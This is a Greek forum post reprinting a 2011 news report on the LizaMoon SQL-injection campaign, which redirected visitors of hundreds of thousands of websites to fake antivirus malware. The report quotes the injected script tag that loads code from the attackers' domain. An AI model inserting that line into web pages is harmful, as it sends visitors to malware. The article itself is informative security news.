Χάκερ πωλούν προστασία Εκατοντάδες χιλιάδες sites με malware

από το GNU/Linux και το Ελεύθερο Λογισμικό/Λογισμικό Ανοιχτού Κώδικα (ΕΛ/ΛΑΚ)

Δημοσίευσηαπό newbie » Παρ Απρ 01, 2011 2:18 pm

Χάκερ πωλούν προστασία
«Εκατοντάδες χιλιάδες» δικτυακοί τόποι παγιδευμένοι με κακόβουλο κώδικα

Δημοσίευση: 01 Απρ. 2011 14:39
Περισσότερες από 380.000 διαδικτυακές διευθύνσεις έχουν μολυνθεί με κακόβουλο κώδικα, ο οποίος δρομολογεί τους χρήστες σε παγιδευμένες ιστοσελίδες που προσφέρουν πλαστό αντι-ιικό λογισμικό, προειδοποιεί εταιρεία ασφάλειας υπολογιστών.

[size=150]Οι άγνωστοι δράστες φέρονται να εκμεταλλεύτηκαν ένα κενό ασφάλειας στο λογισμικό Microsoft SQL Server που τρέχουν πολλοί δικτυακοί τόπο[/size]ι. Εισάγοντας μια γραμμή κώδικα στους διακομιστές, οι χάκερ δρομολογούν τους επισκέπτες των δικτυακών τόπων σε δικές τους, μολυσμένες διευθύνσεις.

Εκεί, οι χρήστες βλέπουν ένα μήνυμα που τους προειδοποιεί ότι οι υπολογιστές τους είναι μολυσμένοι με ιούς, και τους συνιστά να κατεβάσουν ένα πρόγραμμα με την ονομασία Windows Stability Center.

Το πρόγραμμα είναι μεταμφιεσμένο σε λογισμικό προστασίας από ιούς, στη πραγματικότητα όμως δίνει στους χάκερ τον έλεγχο του συστήματος.

Ακολουθώντας μια τακτική που ονομάζεται «επίθεση εισαγωγής SQL» (SQL injection attack), οι χάκερ εισήγαγαν στους ξένους δικτυακούς τόπους τον κώδικα «<script src=http://lizamoon.com/ur.php».

Η αμερικανική εταιρεία Websense που αντελήφθη το πρόβλημα βάφτισε την επιχείρηση των χάκερ Lizamoon, από το όνομα του πρώτου κακόβουλου δικτυακού τόπου στον οποίο οδηγούνταν οι χρήστες.

Η διεύθυνση αυτή έπαψε μεν να λειτουργεί, φαίνεται όμως ότι οι χάκερ ενεργοποιούν άλλες διευθύνσεις στη θέση της.

Η επίθεση φέρεται να ξεκίνησε στις 29 Μαρτίου με περίπου 28.000 μολυσμένους δικτυακούς τόπους, ωστόσο μέχρι την Παρασκευή ο αριθμός τους είχε φτάσει τις 380.000.

Newsroom ΔΟΛ
Άβαταρ μέλους
newbie
Ειδικός Συντονιστής
Ειδικός Συντονιστής
 
Δημοσιεύσεις: 208
Εγγραφή: Κυρ Νοέμ 08, 2009 5:36 pm

Επιστροφή στο Νέα - Ειδήσεις - Ανακοινώσεις



Μέλη σε σύνδεση

Μέλη σε αυτή την Δ. Συζήτηση : Δεν υπάρχουν εγγεγραμμένα μέλη και 1 επισκέπτης

cron